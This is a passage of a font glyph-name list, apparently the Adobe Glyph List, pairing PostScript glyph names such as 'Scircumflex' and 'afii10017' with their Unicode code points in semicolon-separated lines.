Scircumflex;015C
Scommaaccent;0218
Sdotaccent;1E60
Sdotbelow;1E62
Sdotbelowdotaccent;1E68
Seharmenian;054D
Sevenroman;2166
Shaarmenian;0547
Shacyrillic;0428
Shchacyrillic;0429
Sheicoptic;03E2
Shhacyrillic;04BA
Shimacoptic;03EC
Sigma;03A3
Sixroman;2165
Smonospace;FF33
Softsigncyrillic;042C
Ssmall;F773
Stigmagreek;03DA
T;0054
Tau;03A4
Tbar;0166
Tcaron;0164
Tcedilla;0162
Tcircle;24C9
Tcircumflexbelow;1E70
Tcommaaccent;0162
Tdotaccent;1E6A
Tdotbelow;1E6C
Tecyrillic;0422
Tedescendercyrillic;04AC
Tenroman;2169
Tetsecyrillic;04B4
Theta;0398
Thook;01AC
Thorn;00DE
Thornsmall;F7FE
Threeroman;2162
Tildesmall;F6FE
Tiwnarmenian;054F
Tlinebelow;1E6E
Tmonospace;FF34
Toarmenian;0539
Tonefive;01BC
Tonesix;0184
Tonetwo;01A7
Tretroflexhook;01AE
Tsecyrillic;0426
Tshecyrillic;040B
Tsmall;F774
Twelveroman;216B
Tworoman;2161
U;0055
Uacute;00DA
Uacutesmall;F7FA
Ubreve;016C
Ucaron;01D3
Ucircle;24CA
Ucircumflex;00DB
Ucircumflexbelow;1E76
Ucircumflexsmall;F7FB
Ucyrillic;0423
Udblacute;0170
Udblgrave;0214
Udieresis;00DC
Udieresisacute;01D7
Udieresisbelow;1E72
Udieresiscaron;01D9
Udieresiscyrillic;04F0
Udieresisgrave;01DB
Udieresismacron;01D5
Udieresissmall;F7FC
Udotbelow;1EE4
Ugrave;00D9
Ugravesmall;F7F9
Uhookabove;1EE6
Uhorn;01AF
Uhornacute;1EE8
Uhorndotbelow;1EF0
Uhorngrave;1EEA
Uhornhookabove;1EEC
Uhorntilde;1EEE
Uhungarumlaut;0170
Uhungarumlautcyrillic;04F2
Uinvertedbreve;0216
Ukcyrillic;0478
Umacron;016A
Umacroncyrillic;04EE
Umacrondieresis;1E7A
Umonospace;FF35
Uogonek;0172
Upsilon;03A5
Upsilon1;03D2
Upsilonacutehooksymbolgreek;03D3
Upsilonafrican;01B1
Upsilondieresis;03AB
Upsilondieresishooksymbolgreek;03D4
Upsilonhooksymbol;03D2
Upsilontonos;038E
Uring;016E
Ushortcyrillic;040E
Usmall;F775
Ustraightcyrillic;04AE
Ustraightstrokecyrillic;04B0
Utilde;0168
Utildeacute;1E78
Utildebelow;1E74
V;0056
Vcircle;24CB
Vdotbelow;1E7E
Vecyrillic;0412
Vewarmenian;054E
Vhook;01B2
Vmonospace;FF36
Voarmenian;0548
Vsmall;F776
Vtilde;1E7C
W;0057
Wacute;1E82
Wcircle;24CC
Wcircumflex;0174
Wdieresis;1E84
Wdotaccent;1E86
Wdotbelow;1E88
Wgrave;1E80
Wmonospace;FF37
Wsmall;F777
X;0058
Xcircle;24CD
Xdieresis;1E8C
Xdotaccent;1E8A
Xeharmenian;053D
Xi;039E
Xmonospace;FF38
Xsmall;F778
Y;0059
Yacute;00DD
Yacutesmall;F7FD
Yatcyrillic;0462
Ycircle;24CE
Ycircumflex;0176
Ydieresis;0178
Ydieresissmall;F7FF
Ydotaccent;1E8E
Ydotbelow;1EF4
Yericyrillic;042B
Yerudieresiscyrillic;04F8
Ygrave;1EF2
Yhook;01B3
Yhookabove;1EF6
Yiarmenian;0545
Yicyrillic;0407
Yiwnarmenian;0552
Ymonospace;FF39
Ysmall;F779
Ytilde;1EF8
Yusbigcyrillic;046A
Yusbigiotifiedcyrillic;046C
Yuslittlecyrillic;0466
Yuslittleiotifiedcyrillic;0468
Z;005A
Zaarmenian;0536
Zacute;0179
Zcaron;017D
Zcaronsmall;F6FF
Zcircle;24CF
Zcircumflex;1E90
Zdot;017B
Zdotaccent;017B
Zdotbelow;1E92
Zecyrillic;0417
Zedescendercyrillic;0498
Zedieresiscyrillic;04DE
Zeta;0396
Zhearmenian;053A
Zhebrevecyrillic;04C1
Zhecyrillic;0416
Zhedescendercyrillic;0496
Zhedieresiscyrillic;04DC
Zlinebelow;1E94
Zmonospace;FF3A
Zsmall;F77A
Zstroke;01B5
a;0061
aabengali;0986
aacute;00E1
aadeva;0906
aagujarati;0A86
aagurmukhi;0A06
aamatragurmukhi;0A3E
aarusquare;3303
aavowelsignbengali;09BE
aavowelsigndeva;093E
aavowelsigngujarati;0ABE
abbreviationmarkarmenian;055F
abbreviationsigndeva;0970
abengali;0985
abopomofo;311A
abreve;0103
abreveacute;1EAF
abrevecyrillic;04D1
abrevedotbelow;1EB7
abrevegrave;1EB1
abrevehookabove;1EB3
abrevetilde;1EB5
acaron;01CE
acircle;24D0
acircumflex;00E2
acircumflexacute;1EA5
acircumflexdotbelow;1EAD
acircumflexgrave;1EA7
acircumflexhookabove;1EA9
acircumflextilde;1EAB
acute;00B4
acutebelowcmb;0317
acutecmb;0301
acutecomb;0301
acutedeva;0954
acutelowmod;02CF
acutetonecmb;0341
acyrillic;0430
adblgrave;0201
addakgurmukhi;0A71
adeva;0905
adieresis;00E4
adieresiscyrillic;04D3
adieresismacron;01DF
adotbelow;1EA1
adotmacron;01E1
ae;00E6
aeacute;01FD
aekorean;3150
aemacron;01E3
afii00208;2015
afii08941;20A4
afii10017;0410
afii10018;0411
afii10019;0412
afii10020;0413
afii10021;0414
afii10022;0415
afii10023;0401
afii10024;0416
afii10025;0417
afii10026;0418
afii10027;0419
afii10028;041A
afii10029;041B
afii10030;041C
afii10031;041D
afii10032;041E
afii10033;041F
afii10034;0420
afii10035;0421
afii10036;0422
afii10037;0423
afii10038;0424
afii10039;0425
afii10040;0426
afii10041;0427
afii10042;0428
afii10043;0429
afii10044;042A
afii10045;042B
afii10046;042C
afii10047;042D
afii10048;042E
afii10049;042F
afii10050;0490
afii10051;0402
afii10052;0403
afii10053;0404
afii10054;0405
afii10055;0406
afii10056;0407
afii10057;0408
afii10058;0409
afii10059;040A
afii10060;040B
afii10061;040C
afii10062;040E
afii10063;F6C4
afii10064;F6C5
afii10065;0430
afii10066;0431
afii10067;0432
afii10068;0433
afii10069;0434
afii10070;0435
afii10071;0451
afii10072;0436
afii10073;0437
afii10074;0438
afii10075;0439
afii10076;043A
afii10077;043B
afii10078;043C
afii10079;043D
afii10080;043E
afii10081;043F
afii10082;0440
afii10083;0441
afii10084;0442
afii10085;0443
afii10086;0444
afii10087;0445
afii10088;0446
afii10089;0447
afii10090;0448
afii10091;0449
afii10092;044A
afii10093;044B
afii10094;044C
afii10095;044D
afii10096;044E
afii10097;044F
afii10098;0491
afii10099;0452
afii10100;0453
afii10101;0454
afii10102;0455
afii10103;0456
afii10104;0457
afii10105;0458
afii10106;0459
afii10107;045A
afii10108;045B
afii10109;045C
afii10110;045E
afii10145;040F
afii10146;0462
afii10147;0472
afii10148;0474
afii10192;F6C6
afii10193;045F
afii10194;0463
afii10195;0473
afii10196;0475
afii10831;F6C7
afii10832;F6C8
afii10846;04D9
afii299;200E
afii300;200F
afii301;200D
afii57381;066A
afii57388;060C
afii57392;0660
afii57393;0661
afii57394;0662
afii57395;0663
afii57396;0664
afii57397;0665
afii57398;0666
afii57399;0667
afii57400;0668
afii57401;0669
afii57403;061B
afii57407;061F
afii57409;0621
afii57410;0622
afii57411;0623
afii57412;0624
afii57413;0625
afii57414;0626
afii57415;0627
afii57416;0628
afii57417;0629
afii57418;062A
afii57419;062B
afii57420;062C
afii57421;062D
afii57422;062E
afii57423;062F
afii57424;0630
afii57425;0631
afii57426;0632
afii57427;0633
afii57428;0634
afii57429;0635
afii57430;0636
afii57431;0637
afii57432;0638
afii57433;0639
afii57434;063A
afii57440;0640
afii57441;0641
afii57442;0642
afii57443;0643
afii57444;0644
afii57445;0645
afii57446;0646
afii57448;0648
afii57449;0649
afii57450;064A
afii57451;064B
afii57452;064C
afii57453;064D
afii57454;064E
afii57455;064F
afii57456;0650
afii57457;0651
afii57458;0652
afii57470;0647
afii57505;06A4
afii57506;067E
afii57507;0686
afii57508;0698
afii57509;06AF
afii57511;0679
afii57512;0688
afii57513;0691
afii57514;06BA
afii57519;06D2
afii57534;06D5
afii57636;20AA
afii57645;05BE
afii57658;05C3
afii57664;05D0
afii57665;05D1
afii57666;05D2
afii57667;05D3
afii57668;05D4
afii57669;05D5
afii57670;05D6
afii57671;05D7
afii57672;05D8
afii57673;05D9
afii57674;05DA
afii57675;05DB
afii57676;05DC
afii57677;05DD
afii57678;05DE
afii57679;05DF
afii57680;05E0
afii57681;05E1
afii57682;05E2
afii57683;05E3
afii57684;05E4
afii57685;05E5
afii57686;05E6
afii57687;05E7
afii57688;05E8
afii57689;05E9
afii57690;05EA
afii57694;FB2A
afii57695;FB2B
afii57700;FB4B
afii57705;FB1F
afii57716;05F0
afii57717;05F1
afii57718;05F2
afii57723;FB35
afii57793;05B4
afii57794;05B5
afii57795;05B6
afii57796;05BB
afii57797;05B8
afii57798;05B7
afii57799;05B0
afii57800;05B2
afii57801;05B1
afii57802;05B3
afii57803;05C2
afii57804;05C1
afii57806;05B9
afii57807;05BC
afii57839;05BD
afii57841;05BF
afii57842;05C0
afii57929;02BC
afii61248;2105
afii61289;2113
afii61352;2116
afii61573;202C
afii61574;202D
afii61575;202E
afii61664;200C
afii63167;066D
afii64937;02BD
agrave;00E0
agujarati;0A85
agurmukhi;0A05
ahiragana;3042
ahookabove;1EA3
aibengali;0990
aibopomofo;311E
aideva;0910
aiecyrillic;04D5
aigujarati;0A90
aigurmukhi;0A10
aimatragurmukhi;0A48
ainarabic;0639
ainfinalarabic;FECA
aininitialarabic;FECB
ainmedialarabic;FECC
ainvertedbreve;0203
aivowelsignbengali;09C8
aivowelsigndeva;0948
aivowelsigngujarati;0AC8
akatakana;30A2
akatakanahalfwidth;FF71
akorean;314F
alef;05D0
alefarabic;0627
alefdageshhebrew;FB30
aleffinalarabic;FE8E
alefhamzaabovearabic;0623
alefhamzaabovefinalarabic;FE84
alefhamzabelowarabic;0625
alefhamzabelowfinalarabic;FE88
alefhebrew;05D0
aleflamedhebrew;FB4F
alefmaddaabovearabic;0622
alefmaddaabovefinalarabic;FE82
alefmaksuraarabic;0649
alefmaksurafinalarabic;FEF0
alefmaksurainitialarabic;FEF3
alefmaksuramedialarabic;FEF4
alefpatahhebrew;FB2E
alefqamatshebrew;FB2F
aleph;2135
allequal;224C
alpha;03B1
alphatonos;03AC
amacron;0101
amonospace;FF41
ampersand;0026
ampersandmonospace;FF06
ampersandsmall;F726
amsquare;33C2
anbopomofo;3122
angbopomofo;3124
angkhankhuthai;0E5A
angle;2220
anglebracketleft;3008
anglebracketleftvertical;FE3F
anglebracketright;3009
anglebracketrightvertical;FE40
angleleft;2329
angleright;232A
angstrom;212B
anoteleia;0387
anudattadeva;0952
anusvarabengali;0982
anusvaradeva;0902
anusvaragujarati;0A82
aogonek;0105
apaatosquare;3300
aparen;249C
apostrophearmenian;055A
apostrophemod;02BC
apple;F8FF
approaches;2250
approxequal;2248
approxequalorimage;2252
approximatelyequal;2245
araeaekorean;318E
araeakorean;318D
arc;2312
arighthalfring;1E9A
aring;00E5
aringacute;01FB
aringbelow;1E01
arrowboth;2194
arrowdashdown;21E3
arrowdashleft;21E0
arrowdashright;21E2
arrowdashup;21E1
arrowdblboth;21D4
arrowdbldown;21D3
arrowdblleft;21D0
arrowdblright;21D2
arrowdblup;21D1
arrowdown;2193
arrowdownleft;2199
arrowdownright;2198
arrowdownwhite;21E9
arrowheaddownmod;02C5
arrowheadleftmod;02C2
arrowheadrightmod;02C3
arrowheadupmod;02C4
arrowhorizex;F8E7
arrowleft;2190
arrowleftdbl;21D0
arrowleftdblstroke;21CD
arrowleftoverright;21C6
arrowleftwhite;21E6
arrowright;2192
arrowrightdblstroke;21CF
arrowrightheavy;279E
arrowrightoverleft;21C4
arrowrightwhite;21E8
arrowtableft;21E4
arrowtabright;21E5
arrowup;2191
arrowupdn;2195
arrowupdnbse;21A8
arrowupdownbase;21A8
arrowupleft;2196
arrowupleftofdown;21C5
arrowupright;2197
arrowupwhite;21E7
arrowvertex;F8E6
asciicircum;005E
asciicircummonospace;FF3E
asciitilde;007E
asciitildemonospace;FF5E
ascript;0251
ascriptturned;0252
asmallhiragana;3041
asmallkatakana;30A1
asmallkatakanahalfwidth;FF67
asterisk;002A
asteriskaltonearabic;066D
asteriskarabic;066D
asteriskmath;2217
asteriskmonospace;FF0A
asterisksmall;FE61
asterism;2042
asuperior;F6E9
asymptoticallyequal;2243
at;0040
atilde;00E3
atmonospace;FF20
atsmall;FE6B
aturned;0250
aubengali;0994
aubopomofo;3120
audeva;0914
augujarati;0A94
augurmukhi;0A14
aulengthmarkbengali;09D7
aumatragurmukhi;0A4C
auvowelsignbengali;09CC
auvowelsigndeva;094C
auvowelsigngujarati;0ACC
avagrahadeva;093D
aybarmenian;0561
ayin;05E2
ayinaltonehebrew;FB20
ayinhebrew;05E2
b;0062
babengali;09AC
backslash;005C
backslashmonospace;FF3C
badeva;092C
bagujarati;0AAC
bagurmukhi;0A2C
bahiragana;3070
bahtthai;0E3F
bakatakana;30D0
bar;007C
barmonospace;FF5C
bbopomofo;3105
bcircle;24D1
bdotaccent;1E03
bdotbelow;1E05
beamedsixteenthnotes;266C
because;2235
becyrillic;0431
beharabic;0628
behfinalarabic;FE90
behinitialarabic;FE91
behiragana;3079
behmedialarabic;FE92
behmeeminitialarabic;FC9F
behmeemisolatedarabic;FC08
behnoonfinalarabic;FC6D
bekatakana;30D9
benarmenian;0562
bet;05D1
beta;03B2
betasymbolgreek;03D0
betdagesh;FB31
betdageshhebrew;FB31
bethebrew;05D1
betrafehebrew;FB4C
bhabengali;09AD
bhadeva;092D
bhagujarati;0AAD
bhagurmukhi;0A2D
bhook;0253
bihiragana;3073
bikatakana;30D3
bilabialclick;0298
bindigurmukhi;0A02
birusquare;3331
blackcircle;25CF
blackdiamond;25C6
blackdownpointingtriangle;25BC
blackleftpointingpointer;25C4
blackleftpointingtriangle;25C0
blacklenticularbracketleft;3010
blacklenticularbracketleftvertical;FE3B
blacklenticularbracketright;3011
blacklenticularbracketrightvertical;FE3C
blacklowerlefttriangle;25E3
blacklowerrighttriangle;25E2
blackrectangle;25AC
blackrightpointingpointer;25BA
blackrightpointingtriangle;25B6
blacksmallsquare;25AA
blacksmilingface;263B
blacksquare;25A0
blackstar;2605
blackupperlefttriangle;25E4
blackupperrighttriangle;25E5
blackuppointingsmalltriangle;25B4
blackuppointingtriangle;25B2
blank;2423
blinebelow;1E07
block;2588
bmonospace;FF42
bobaimaithai;0E1A
bohiragana;307C
bokatakana;30DC
bparen;249D
bqsquare;33C3
braceex;F8F4
braceleft;007B
braceleftbt;F8F3
braceleftmid;F8F2
braceleftmonospace;FF5B
braceleftsmall;FE5B
bracelefttp;F8F1
braceleftvertical;FE37
braceright;007D
bracerightbt;F8FE
bracerightmid;F8FD
bracerightmonospace;FF5D
bracerightsmall;FE5C
bracerighttp;F8FC
bracerightvertical;FE38
bracketleft;005B
bracketleftbt;F8F0
bracketleftex;F8EF
bracketleftmonospace;FF3B
bracketlefttp;F8EE
bracketright;005D
bracketrightbt;F8FB
bracketrightex;F8FA
bracketrightmonospace;FF3D
bracketrighttp;F8F9
breve;02D8
brevebelowcmb;032E
brevecmb;0306
breveinvertedbelowcmb;032F
breveinvertedcmb;0311
breveinverteddoublecmb;0361
bridgebelowcmb;032A
bridgeinvertedbelowcmb;033A
brokenbar;00A6
bstroke;0180
bsuperior;F6EA
btopbar;0183
buhiragana;3076
bukatakana;30D6
bullet;2022
bulletinverse;25D8
bulletoperator;2219
bullseye;25CE
c;0063
caarmenian;056E
cabengali;099A
cacute;0107
cadeva;091A
cagujarati;0A9A
cagurmukhi;0A1A
calsquare;3388
candrabindubengali;0981
candrabinducmb;0310
candrabindudeva;0901
candrabindugujarati;0A81
capslock;21EA
careof;2105
caron;02C7
caronbelowcmb;032C
caroncmb;030C
carriagereturn;21B5
cbopomofo;3118
ccaron;010D
ccedilla;00E7
ccedillaacute;1E09
ccircle;24D2
ccircumflex;0109
ccurl;0255
cdot;010B
cdotaccent;010B
cdsquare;33C5
cedilla;00B8
cedillacmb;0327
cent;00A2
centigrade;2103
centinferior;F6DF
centmonospace;FFE0
centoldstyle;F7A2
centsuperior;F6E0
chaarmenian;0579
chabengali;099B
chadeva;091B
chagujarati;0A9B
chagurmukhi;0A1B
chbopomofo;3114
cheabkhasiancyrillic;04BD
checkmark;2713
checyrillic;0447
chedescenderabkhasiancyrillic;04BF
chedescendercyrillic;04B7
chedieresiscyrillic;04F5
cheharmenian;0573
chekhakassiancyrillic;04CC
cheverticalstrokecyrillic;04B9
chi;03C7
chieuchacirclekorean;3277
chieuchaparenkorean;3217
chieuchcirclekorean;3269
chieuchkorean;314A
chieuchparenkorean;3209
chochangthai;0E0A
chochanthai;0E08
chochingthai;0E09
chochoethai;0E0C
chook;0188
cieucacirclekorean;3276
cieucaparenkorean;3216
cieuccirclekorean;3268
cieuckorean;3148
cieucparenkorean;3208
cieucuparenkorean;321C
circle;25CB
circlemultiply;2297
circleot;2299
circleplus;2295
circlepostalmark;3036
circlewithlefthalfblack;25D0
circlewithrighthalfblack;25D1
circumflex;02C6
circumflexbelowcmb;032D
circumflexcmb;0302
clear;2327
clickalveolar;01C2
clickdental;01C0
clicklateral;01C1
clickretroflex;01C3
club;2663
clubsuitblack;2663
clubsuitwhite;2667
cmcubedsquare;33A4
cmonospace;FF43
cmsquaredsquare;33A0
coarmenian;0581
colon;003A
colonmonetary;20A1
colonmonospace;FF1A
colonsign;20A1
colonsmall;FE55
colontriangularhalfmod;02D1
colontriangularmod;02D0
comma;002C
commaabovecmb;0313
commaaboverightcmb;0315
commaaccent;F6C3
commaarabic;060C
commaarmenian;055D
commainferior;F6E1
commamonospace;FF0C
commareversedabovecmb;0314
commareversedmod;02BD
commasmall;FE50
commasuperior;F6E2
commaturnedabovecmb;0312
commaturnedmod;02BB
compass;263C
congruent;2245
contourintegral;222E
control;2303
controlACK;0006
controlBEL;0007
controlBS;0008
controlCAN;0018
controlCR;000D
controlDC1;0011
controlDC2;0012
controlDC3;0013
controlDC4;0014
controlDEL;007F
controlDLE;0010
controlEM;0019
controlENQ;0005
controlEOT;0004
controlESC;001B
controlETB;0017
controlETX;0003
controlFF;000C
controlFS;001C
controlGS;001D
controlHT;0009
controlLF;000A
controlNAK;0015
controlRS;001E
controlSI;000F
controlSO;000E
controlSOT;0002
controlSTX;0001
controlSUB;001A
controlSYN;0016
controlUS;001F
controlVT;000B
copyright;00A9
copyrightsans;F8E9
copyrightserif;F6D9
cornerbracketleft;300C
cornerbracketlefthalfwidth;FF62
cornerbracketleftvertical;FE41
cornerbracketright;300D
cornerbracketrighthalfwidth;FF63
cornerbracketrightvertical;FE42
corporationsquare;337F
cosquare;33C7
coverkgsquare;33C6
cparen;249E
cruzeiro;20A2
cstretched;0297
curlyand;22CF
curlyor;22CE
currency;00A4
cyrBreve;F6D1
cyrFlex;F6D2
cyrbreve;F6D4
cyrflex;F6D5
d;0064
daarmenian;0564
dabengali;09A6
dadarabic;0636
dadeva;0926
dadfinalarabic;FEBE
dadinitialarabic;FEBF
dadmedialarabic;FEC0
dagesh;05BC
dageshhebrew;05BC
dagger;2020
daggerdbl;2021
dagujarati;0AA6
dagurmukhi;0A26
dahiragana;3060
dakatakana;30C0
dalarabic;062F
dalet;05D3
daletdagesh;FB33
daletdageshhebrew;FB33
dalethatafpatah;05D3 05B2
dalethatafpatahhebrew;05D3 05B2
dalethatafsegol;05D3 05B1
dalethatafsegolhebrew;05D3 05B1
dalethebrew;05D3
dalethiriq;05D3 05B4
dalethiriqhebrew;05D3 05B4
daletholam;05D3 05B9
daletholamhebrew;05D3 05B9
daletpatah;05D3 05B7
daletpatahhebrew;05D3 05B7
daletqamats;05D3 05B8
daletqamatshebrew;05D3 05B8
daletqubuts;05D3 05BB
daletqubutshebrew;05D3 05BB
daletsegol;05D3 05B6
daletsegolhebrew;05D3 05B6
daletsheva;05D3 05B0
daletshevahebrew;05D3 05B0
dalettsere;05D3 05B5
dalettserehebrew;05D3 05B5
dalfinalarabic;FEAA
dammaarabic;064F
dammalowarabic;064F
dammatanaltonearabic;064C
dammatanarabic;064C
danda;0964
dargahebrew;05A7
dargalefthebrew;05A7
dasiapneumatacyrilliccmb;0485
dblGrave;F6D3
dblanglebracketleft;300A
dblanglebracketleftvertical;FE3D
dblanglebracketright;300B
dblanglebracketrightvertical;FE3E
dblarchinvertedbelowcmb;032B
dblarrowleft;21D4
dblarrowright;21D2
dbldanda;0965
dblgrave;F6D6
dblgravecmb;030F
dblintegral;222C
dbllowline;2017
dbllowlinecmb;0333
dbloverlinecmb;033F
dblprimemod;02BA
dblverticalbar;2016
dblverticallineabovecmb;030E
dbopomofo;3109
dbsquare;33C8
dcaron;010F
dcedilla;1E11
dcircle;24D3
dcircumflexbelow;1E13
dcroat;0111
ddabengali;09A1
ddadeva;0921
ddagujarati;0AA1
ddagurmukhi;0A21
ddalarabic;0688
ddalfinalarabic;FB89
dddhadeva;095C
ddhabengali;09A2
ddhadeva;0922
ddhagujarati;0AA2
ddhagurmukhi;0A22
ddotaccent;1E0B
ddotbelow;1E0D
decimalseparatorarabic;066B
decimalseparatorpersian;066B
decyrillic;0434
degree;00B0
dehihebrew;05AD
dehiragana;3067
deicoptic;03EF
dekatakana;30C7
deleteleft;232B
deleteright;2326
delta;03B4
deltaturned;018D
denominatorminusonenumeratorbengali;09F8
dezh;02A4
dhabengali;09A7
dhadeva;0927
dhagujarati;0AA7
dhagurmukhi;0A27
dhook;0257
dialytikatonos;0385
dialytikatonoscmb;0344
diamond;2666
diamondsuitwhite;2662
dieresis;00A8
dieresisacute;F6D7
dieresisbelowcmb;0324
dieresiscmb;0308
dieresisgrave;F6D8
dieresistonos;0385
dihiragana;3062
dikatakana;30C2
dittomark;3003
divide;00F7
divides;2223
divisionslash;2215
djecyrillic;0452
dkshade;2593
dlinebelow;1E0F
dlsquare;3397
dmacron;0111
dmonospace;FF44
dnblock;2584
dochadathai;0E0E
dodekthai;0E14
dohiragana;3069
dokatakana;30C9
dollar;0024
dollarinferior;F6E3
dollarmonospace;FF04
dollaroldstyle;F724
dollarsmall;FE69
dollarsuperior;F6E4
dong;20AB
dorusquare;3326
dotaccent;02D9
dotaccentcmb;0307
dotbelowcmb;0323
dotbelowcomb;0323
dotkatakana;30FB
dotlessi;0131
dotlessj;F6BE
dotlessjstrokehook;0284
dotmath;22C5
dottedcircle;25CC
doubleyodpatah;FB1F
doubleyodpatahhebrew;FB1F
downtackbelowcmb;031E
downtackmod;02D5
dparen;249F
dsuperior;F6EB
dtail;0256
dtopbar;018C
duhiragana;3065
dukatakana;30C5
dz;01F3
dzaltone;02A3
dzcaron;01C6
dzcurl;02A5
dzeabkhasiancyrillic;04E1
dzecyrillic;0455
dzhecyrillic;045F
e;0065
eacute;00E9
earth;2641
ebengali;098F
ebopomofo;311C
ebreve;0115
ecandradeva;090D
ecandragujarati;0A8D
ecandravowelsigndeva;0945
ecandravowelsigngujarati;0AC5
ecaron;011B
ecedillabreve;1E1D
echarmenian;0565
echyiwnarmenian;0587
ecircle;24D4
ecircumflex;00EA
ecircumflexacute;1EBF
ecircumflexbelow;1E19
ecircumflexdotbelow;1EC7
ecircumflexgrave;1EC1
ecircumflexhookabove;1EC3
ecircumflextilde;1EC5
ecyrillic;0454
edblgrave;0205
edeva;090F
edieresis;00EB
edot;0117
edotaccent;0117
edotbelow;1EB9
eegurmukhi;0A0F
eematragurmukhi;0A47
efcyrillic;0444
egrave;00E8
egujarati;0A8F
eharmenian;0567
ehbopomofo;311D
ehiragana;3048
ehookabove;1EBB
eibopomofo;311F
eight;0038
eightarabic;0668
eightbengali;09EE
eightcircle;2467
eightcircleinversesansserif;2791
eightdeva;096E
eighteencircle;2471
eighteenparen;2485
eighteenperiod;2499
eightgujarati;0AEE
eightgurmukhi;0A6E
eighthackarabic;0668
eighthangzhou;3028
eighthnotebeamed;266B
eightideographicparen;3227
eightinferior;2088
eightmonospace;FF18
eightoldstyle;F738
eightparen;247B
eightperiod;248F
eightpersian;06F8
eightroman;2177
eightsuperior;2078
eightthai;0E58
einvertedbreve;0207
eiotifiedcyrillic;0465
ekatakana;30A8
ekatakanahalfwidth;FF74
ekonkargurmukhi;0A74
ekorean;3154
elcyrillic;043B
element;2208
elevencircle;246A
elevenparen;247E
elevenperiod;2492
elevenroman;217A
ellipsis;2026
ellipsisvertical;22EE
emacron;0113
emacronacute;1E17
emacrongrave;1E15
emcyrillic;043C
emdash;2014
emdashvertical;FE31
emonospace;FF45
emphasismarkarmenian;055B
emptyset;2205
enbopomofo;3123
encyrillic;043D
endash;2013
endashvertical;FE32
endescendercyrillic;04A3
eng;014B
engbopomofo;3125
enghecyrillic;04A5
enhookcyrillic;04C8
enspace;2002
eogonek;0119
eokorean;3153
eopen;025B
eopenclosed;029A
eopenreversed;025C
eopenreversedclosed;025E
eopenreversedhook;025D
eparen;24A0
epsilon;03B5
epsilontonos;03AD
equal;003D
equalmonospace;FF1D
equalsmall;FE66
equalsuperior;207C
equivalence;2261
erbopomofo;3126
ercyrillic;0440
ereversed;0258
ereversedcyrillic;044D
escyrillic;0441
esdescendercyrillic;04AB
esh;0283
eshcurl;0286
eshortdeva;090E
eshortvowelsigndeva;0946
eshreversedloop;01AA
eshsquatreversed;0285
esmallhiragana;3047
esmallkatakana;30A7
esmallkatakanahalfwidth;FF6A
estimated;212E
esuperior;F6EC
eta;03B7
etarmenian;0568
etatonos;03AE
eth;00F0
etilde;1EBD
etildebelow;1E1B
etnahtafoukhhebrew;0591
etnahtafoukhlefthebrew;0591
etnahtahebrew;0591
etnahtalefthebrew;0591
eturned;01DD
eukorean;3161
euro;20AC
evowelsignbengali;09C7
evowelsigndeva;0947
evowelsigngujarati;0AC7
exclam;0021
exclamarmenian;055C
exclamdbl;203C
exclamdown;00A1
exclamdownsmall;F7A1
exclammonospace;FF01
exclamsmall;F721
existential;2203
ezh;0292
ezhcaron;01EF
ezhcurl;0293
ezhreversed;01B9
ezhtail;01BA
f;0066
fadeva;095E
fagurmukhi;0A5E
fahrenheit;2109
fathaarabic;064E
fathalowarabic;064E
fathatanarabic;064B
fbopomofo;3108
fcircle;24D5
fdotaccent;1E1F
feharabic;0641
feharmenian;0586
fehfinalarabic;FED2
fehinitialarabic;FED3
fehmedialarabic;FED4
feicoptic;03E5
female;2640
ff;FB00
ffi;FB03
ffl;FB04
fi;FB01
fifteencircle;246E
fifteenparen;2482
fifteenperiod;2496
figuredash;2012
filledbox;25A0
filledrect;25AC
finalkaf;05DA
finalkafdagesh;FB3A
finalkafdageshhebrew;FB3A
finalkafhebrew;05DA
finalkafqamats;05DA 05B8
finalkafqamatshebrew;05DA 05B8
finalkafsheva;05DA 05B0
finalkafshevahebrew;05DA 05B0
finalmem;05DD
finalmemhebrew;05DD
finalnun;05DF
finalnunhebrew;05DF
finalpe;05E3
finalpehebrew;05E3
finaltsadi;05E5
finaltsadihebrew;05E5
firsttonechinese;02C9
fisheye;25C9
fitacyrillic;0473
five;0035
fivearabic;0665
fivebengali;09EB
fivecircle;2464
fivecircleinversesansserif;278E
fivedeva;096B
fiveeighths;215D
fivegujarati;0AEB
fivegurmukhi;0A6B
fivehackarabic;0665
fivehangzhou;3025
fiveideographicparen;3224
fiveinferior;2085
fivemonospace;FF15
fiveoldstyle;F735
fiveparen;2478
fiveperiod;248C
fivepersian;06F5
fiveroman;2174
fivesuperior;2075
fivethai;0E55
fl;FB02
florin;0192
fmonospace;FF46
fmsquare;3399
fofanthai;0E1F
fofathai;0E1D
fongmanthai;0E4F
forall;2200
four;0034
fourarabic;0664
fourbengali;09EA
fourcircle;2463
fourcircleinversesansserif;278D
fourdeva;096A
fourgujarati;0AEA
fourgurmukhi;0A6A
fourhackarabic;0664
fourhangzhou;3024
fourideographicparen;3223
fourinferior;2084
fourmonospace;FF14
fournumeratorbengali;09F7
fouroldstyle;F734
fourparen;2477
fourperiod;248B
fourpersian;06F4
fourroman;2173
foursuperior;2074
fourteencircle;246D
fourteenparen;2481
fourteenperiod;2495
fourthai;0E54
fourthtonechinese;02CB
fparen;24A1
fraction;2044
franc;20A3
g;0067
gabengali;0997
gacute;01F5
gadeva;0917
gafarabic;06AF
gaffinalarabic;FB93
gafinitialarabic;FB94
gafmedialarabic;FB95
gagujarati;0A97
gagurmukhi;0A17
gahiragana;304C
gakatakana;30AC
gamma;03B3
gammalatinsmall;0263
gammasuperior;02E0
gangiacoptic;03EB
gbopomofo;310D
gbreve;011F
gcaron;01E7
gcedilla;0123
gcircle;24D6
gcircumflex;011D
gcommaaccent;0123
gdot;0121
gdotaccent;0121
gecyrillic;0433
gehiragana;3052
gekatakana;30B2
geometricallyequal;2251
gereshaccenthebrew;059C
gereshhebrew;05F3
gereshmuqdamhebrew;059D
germandbls;00DF
gershayimaccenthebrew;059E
gershayimhebrew;05F4
getamark;3013
ghabengali;0998
ghadarmenian;0572
ghadeva;0918
ghagujarati;0A98
ghagurmukhi;0A18
ghainarabic;063A
ghainfinalarabic;FECE
ghaininitialarabic;FECF
ghainmedialarabic;FED0
ghemiddlehookcyrillic;0495
ghestrokecyrillic;0493
gheupturncyrillic;0491
ghhadeva;095A
ghhagurmukhi;0A5A
ghook;0260
ghzsquare;3393
gihiragana;304E
gikatakana;30AE
gimarmenian;0563
gimel;05D2
gimeldagesh;FB32
gimeldageshhebrew;FB32
gimelhebrew;05D2
gjecyrillic;0453
glottalinvertedstroke;01BE
glottalstop;0294
glottalstopinverted;0296
glottalstopmod;02C0
glottalstopreversed;0295
glottalstopreversedmod;02C1
glottalstopreversedsuperior;02E4
glottalstopstroke;02A1
glottalstopstrokereversed;02A2
